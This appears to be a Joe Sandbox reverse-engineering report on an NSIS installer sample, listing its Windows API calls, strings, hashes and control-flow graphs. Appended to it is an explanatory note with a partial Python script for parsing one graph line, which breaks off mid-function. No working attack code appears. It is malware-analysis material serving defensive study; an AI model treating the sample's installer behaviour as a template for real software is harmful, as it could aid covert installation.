• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID: X_B
• API String ID: 2295610775-941606717
• Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
• Instruction ID: 6d56574ea64d1328abe48e6f64e5cab5a12c2004fb3b9259b4ed260009733db8
• Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
• Instruction Fuzzy Hash: AFD0123250A5205BC6406B386E0C84B7A58AF553717268A36F5AAF21E0CB788C6696AC
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FDD
• ShowWindow.USER32(?), ref: 00403FFD
• GetWindowLongW.USER32(?,000000F0), ref: 0040400F
• ShowWindow.USER32(?,00000004), ref: 00404028
• DestroyWindow.USER32 ref: 0040403C
• SetWindowLongW.USER32(?,00000000,00000000), ref: 00404055
• GetDlgItem.USER32(?,?), ref: 00404074
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404088
• IsWindowEnabled.USER32(00000000), ref: 0040408F
• GetDlgItem.USER32(?,00000001), ref: 0040413A
• GetDlgItem.USER32(?,00000002), ref: 00404144
• SetClassLongW.USER32(?,000000F2,?), ref: 0040415E
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041AF
• GetDlgItem.USER32(?,00000003), ref: 00404255
• ShowWindow.USER32(00000000,?), ref: 00404276
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404288
• EnableWindow.USER32(?,?), ref: 004042A3
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B9
• EnableMenuItem.USER32(00000000), ref: 004042C0
• SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D8
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042EB
• lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404315
• SetWindowTextW.USER32(?,00422F08), ref: 00404329
• ShowWindow.USER32(?,0000000A), ref: 0040445D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
• String ID: fh
• API String ID: 121052019-2499785175
• Opcode ID: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
• Instruction ID: 6cd4652e30ec862c23bd12a6162173760bab2c1fa5186c41ecc3a298f9dddab8
• Opcode Fuzzy Hash: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
• Instruction Fuzzy Hash: 7FC1C0B1600204ABDB216F21EE49E2B3A69FB94709F41053EF751B51F0CB795882DB2E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 307 403bf3-403c0b call 406915 310 403c0d-403c18 GetUserDefaultUILanguage call 406468 307->310 311 403c1f-403c56 call 4063ef 307->311 314 403c1d 310->314 317 403c58-403c69 call 4063ef 311->317 318 403c6e-403c74 lstrcatW 311->318 316 403c79-403ca2 call 403ec9 call 405ef8 314->316 324 403d34-403d3c call 405ef8 316->324 325 403ca8-403cad 316->325 317->318 318->316 331 403d4a-403d6f LoadImageW 324->331 332 403d3e-403d45 call 40655e 324->332 325->324 327 403cb3-403cdb call 4063ef 325->327 327->324 333 403cdd-403ce1 327->333 335 403df0-403df8 call 40140b 331->335 336 403d71-403da1 RegisterClassW 331->336 332->331 337 403cf3-403cff lstrlenW 333->337 338 403ce3-403cf0 call 405e1d 333->338 349 403e02-403e0d call 403ec9 335->349 350 403dfa-403dfd 335->350 339 403da7-403deb SystemParametersInfoW CreateWindowExW 336->339 340 403ebf 336->340 344 403d01-403d0f lstrcmpiW 337->344 345 403d27-403d2f call 405df0 call 406521 337->345 338->337 339->335 343 403ec1-403ec8 340->343 344->345 348 403d11-403d1b GetFileAttributesW 344->348 345->324 352 403d21-403d22 call 405e3c 348->352 353 403d1d-403d1f 348->353 359 403e13-403e2d ShowWindow call 4068a5 349->359 360 403e96-403e97 call 405679 349->360 350->343 352->345 353->345 353->352 365 403e39-403e4b GetClassInfoW 359->365 366 403e2f-403e34 call 4068a5 359->366 364 403e9c-403e9e 360->364 367 403ea0-403ea6 364->367 368 403eb8-403eba call 40140b 364->368 371 403e63-403e86 DialogBoxParamW call 40140b 365->371 372 403e4d-403e5d GetClassInfoW RegisterClassW 365->372 366->365 367->350 373 403eac-403eb3 call 40140b 367->373 368->340 377 403e8b-403e94 call 403b43 371->377 372->371 373->350 377->343
APIs
  • Part of subcall function 00406915: GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
  • Part of subcall function 00406915: GetProcAddress.KERNEL32(00000000,?), ref: 00406942
• GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00434000,00008001), ref: 00403C0D
  • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
• lstrcatW.KERNEL32(1033,00422F08), ref: 00403C74
• lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,00434800,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,74DF3420), ref: 00403CF4
• lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,00434800,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D07
• GetFileAttributesW.KERNEL32(: Completed), ref: 00403D12
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403D5B
• RegisterClassW.USER32(004289C0), ref: 00403D98
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DB0
• CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DE5
• ShowWindow.USER32(00000005,00000000), ref: 00403E1B
• GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E47
• GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E54
• RegisterClassW.USER32(004289C0), ref: 00403E5D
• DialogBoxParamW.USER32(?,00000000,00403FA1,00000000), ref: 00403E7C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
• String ID: .DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
• API String ID: 606308-572083776
• Opcode ID: 0956769c01ddca14b96dea91265e8b7d4d10852685e549966d2ead3f546cae20
• Instruction ID: 6a74b9b34ded998ebd2751605f77428bf44f11e359ee0ac59d58ca77ea789e65
• Opcode Fuzzy Hash: 0956769c01ddca14b96dea91265e8b7d4d10852685e549966d2ead3f546cae20
• Instruction Fuzzy Hash: 2C61B770200740BAD620AF669D46F2B3A7CEB84B45F81453FF941B61E2CB7D5942CB6D
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 380 403082-4030d0 GetTickCount GetModuleFileNameW call 406011 383 4030d2-4030d7 380->383 384 4030dc-40310a call 406521 call 405e3c call 406521 GetFileSize 380->384 385 4032b2-4032b6 383->385 392 403110 384->392 393 4031f5-403203 call 40301e 384->393 395 403115-40312c 392->395 400 403205-403208 393->400 401 403258-40325d 393->401 396 403130-403139 call 40349e 395->396 397 40312e 395->397 406 40325f-403267 call 40301e 396->406 407 40313f-403146 396->407 397->396 403 40320a-403222 call 4034b4 call 40349e 400->403 404 40322c-403256 GlobalAlloc call 4034b4 call 4032b9 400->404 401->385 403->401 426 403224-40322a 403->426 404->401 431 403269-40327a 404->431 406->401 410 4031c2-4031c6 407->410 411 403148-40315c call 405fcc 407->411 415 4031d0-4031d6 410->415 416 4031c8-4031cf call 40301e 410->416 411->415 429 40315e-403165 411->429 422 4031e5-4031ed 415->422 423 4031d8-4031e2 call 406a02 415->423 416->415 422->395 430 4031f3 422->430 423->422 426->401 426->404 429->415 433 403167-40316e 429->433 430->393 434 403282-403287 431->434 435 40327c 431->435 433->415 437 403170-403177 433->437 436 403288-40328e 434->436 435->434 436->436 438 403290-4032ab SetFilePointer call 405fcc 436->438 437->415 439 403179-403180 437->439 442 4032b0 438->442 439->415 441 403182-4031a2 439->441 441->401 443 4031a8-4031ac 441->443 442->385 444 4031b4-4031bc 443->444 445 4031ae-4031b2 443->445 444->415 446 4031be-4031c0 444->446 445->430 445->444 446->415
APIs
• GetTickCount.KERNEL32 ref: 00403093
• GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 004030AF
  • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,00437800,80000000,00000003), ref: 00406015
  • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037
• GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 004030FB
• GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
Strings
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                          • API String ID: 2803837635-2162933095
                                                                                                                                                                                          • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                                                                                                                                          • Instruction ID: 0271efb430f2efbe2fca7880162b12dddab7439e54d706f300c55aed9b32fb97
                                                                                                                                                                                          • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B51C071A01304ABDB209F65DD85B9E7FACAB09316F10407BF904B62D1D7789E818B5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph: rendered graph not recoverable from the report text (function starting at 0040655E)
APIs
• GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00406680
• GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,?,00000000,00000000,00418EC0,00000000), ref: 00406696
• SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 004066F4
• CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 004066FD
• lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406728
• lstrlenW.KERNEL32(: Completed,00000000,Completed,?,?,00000000,00000000,00418EC0,00000000), ref: 00406782
Strings
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
• String ID: 47305662$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 4024019347-3285502050
• Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
• Instruction ID: c1bee3e663878f3afad94de22ef935420ccf361ce06c76a1d76179cfc985cdfa
• Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
• Instruction Fuzzy Hash: 266146B1A043019BDB205F28DD80B6B77E4AF84318F65053FF646B32D1DA7D89A18B5E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph: rendered graph not recoverable from the report text (function starting at 00401774)
APIs
• lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
• CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,?,00000031), ref: 004017DA
  • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
  • Part of subcall function 004055A6: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
  • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
  • Part of subcall function 004055A6: lstrcatW.KERNEL32(Completed,004033F2), ref: 00405601
  • Part of subcall function 004055A6: SetWindowTextW.USER32(Completed,Completed), ref: 00405613
  • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
  • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
  • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
Strings
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
• String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$open$open cmd
• API String ID: 1941528284-1391832873
• Opcode ID: fee3e7ed0ab5e121637f04a725511c5a0f25f3915fa7b28c3905e20eb0eb94be
• Instruction ID: 1777f765e23ed303a4c4324df0f40fc052c607b9e3f25272d24a03cacca2a4dc
• Opcode Fuzzy Hash: fee3e7ed0ab5e121637f04a725511c5a0f25f3915fa7b28c3905e20eb0eb94be
• Instruction Fuzzy Hash: 9E41A531900509BACF117BA9DD86DAF3AB5EF45328B20423FF512B10E1DB3C8A52966D
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph: rendered graph not recoverable from the report text (function starting at 004055A6)
APIs
• lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
• lstrlenW.KERNEL32(004033F2,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
• lstrcatW.KERNEL32(Completed,004033F2), ref: 00405601
• SetWindowTextW.USER32(Completed,Completed), ref: 00405613
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
• SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
Strings
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID: Completed
• API String ID: 2531174081-3087654605
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
APIs
Strings
Similarity
• API ID: CountTick$wsprintf
• String ID: ... %d%%
• API String ID: 551687249-2449383134
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
APIs
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
• wsprintfW.USER32 ref: 004068F7
• LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040690B
Strings
Similarity
• API ID: DirectoryLibraryLoadSystemwsprintf
• String ID: %s%S.dll$UXTHEME
• API String ID: 2200240437-1106614640
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
APIs
• GetTickCount.KERNEL32 ref: 0040605E
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004034FA,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6), ref: 00406079
Strings
Similarity
• API ID: CountFileNameTempTick
• String ID: C:\Users\user\AppData\Local\Temp\$nsa
• API String ID: 1716503409-678247507
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          control_flow_graph 746 4015c6-4015da call 402dab call 405e9b 751 401636-401639 746->751 752 4015dc-4015ef call 405e1d 746->752 754 401668-4022fb call 401423 751->754 755 40163b-40165a call 401423 call 406521 SetCurrentDirectoryW 751->755 761 4015f1-4015f4 752->761 762 401609-40160c call 405acf 752->762 769 402c2f-402c3e 754->769 755->769 772 401660-401663 755->772 761->762 763 4015f6-4015fd call 405aec 761->763 770 401611-401613 762->770 763->762 776 4015ff-401607 call 405a75 763->776 774 401615-40161a 770->774 775 40162c-401634 770->775 772->769 778 401629 774->778 779 40161c-401627 GetFileAttributesW 774->779 775->751 775->752 776->770 778->775 779->775 779->778
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00405E9B: CharNextW.USER32(?,?,00425710,?,00405F0F,00425710,00425710,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405EA9
                                                                                                                                                                                            • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                                                                                                                                                            • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                                                                                                                                            • Part of subcall function 00405A75: CreateDirectoryW.KERNEL32(?,?), ref: 00405AB7
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,00000000,000000F0), ref: 00401652
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401645
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
                                                                                                                                                                                          • API String ID: 1892508949-455884830
                                                                                                                                                                                          • Opcode ID: 97cd93f1b33c75ee86f75accdaf92d96180db770228cdcf851d3b183614cfa24
                                                                                                                                                                                          • Instruction ID: ceaefb5432ba9a2b041ab88b04bec91c1a8495824eafa6d8534a6d53eb807851
                                                                                                                                                                                          • Opcode Fuzzy Hash: 97cd93f1b33c75ee86f75accdaf92d96180db770228cdcf851d3b183614cfa24
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D11D031504604ABCF206FA5CD4099F36B0EF04368B29493FE941B22E1DA3E4E819E8E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%
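The control_flow_graph line of the entry above is the IDA plugin's edge list for the routine at 004015c6: every basic block appears as a node id, an address range and the calls or imported APIs it contains, followed by a->b edges. Read raw it hides the question a reverse engineer actually asks, namely which blocks must execute before GetFileAttributesW or SetCurrentDirectoryW is reached. The Python below is an added example, not code from Joe Sandbox or its IDA plugin; the token grammar is inferred from the lines shown on this page, and the sample input is that entry's own graph line copied verbatim.

```python
"""Rebuild the basic-block graph from a Joe Sandbox "control_flow_graph" line and
find the shortest path from the function entry to the block invoking an API.
Added example: the token grammar is inferred from the entries on this page."""
import re
from collections import deque
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed input: the graph line of the 004015c6 entry, copied from the report.
SAMPLE_CFG = ("control_flow_graph 746 4015c6-4015da call 402dab call 405e9b 751 401636-401639 "
              "746->751 752 4015dc-4015ef call 405e1d 746->752 754 401668-4022fb call 401423 "
              "751->754 755 40163b-40165a call 401423 call 406521 SetCurrentDirectoryW 751->755 "
              "761 4015f1-4015f4 752->761 762 401609-40160c call 405acf 752->762 769 402c2f-402c3e "
              "754->769 755->769 772 401660-401663 755->772 761->762 763 4015f6-4015fd call 405aec "
              "761->763 770 401611-401613 762->770 763->762 776 4015ff-401607 call 405a75 763->776 "
              "774 401615-40161a 770->774 775 40162c-401634 770->775 772->769 778 401629 774->778 "
              "779 40161c-401627 GetFileAttributesW 774->779 775->751 775->752 776->770 778->775 "
              "779->775")


@dataclass
class Block:
    node: int                                       # node id used by the edge list
    start: int                                      # first instruction address
    end: int                                        # last instruction address (== start for one-instruction blocks)
    calls: List[int] = field(default_factory=list)  # "call XXXXXX" targets inside the block
    apis: List[str] = field(default_factory=list)   # imported APIs invoked inside the block


_EDGE = re.compile(r"^(\d+)->(\d+)$")
_RANGE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")


def parse_cfg(line: str) -> Tuple[Dict[int, Block], List[Tuple[int, int]]]:
    """Grammar as seen on the page: a decimal node id is always followed by its
    address range; "call" is followed by a hex target; any other bare word is an
    API name; "a->b" is an edge. Annotations belong to the most recent node."""
    tokens = line.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
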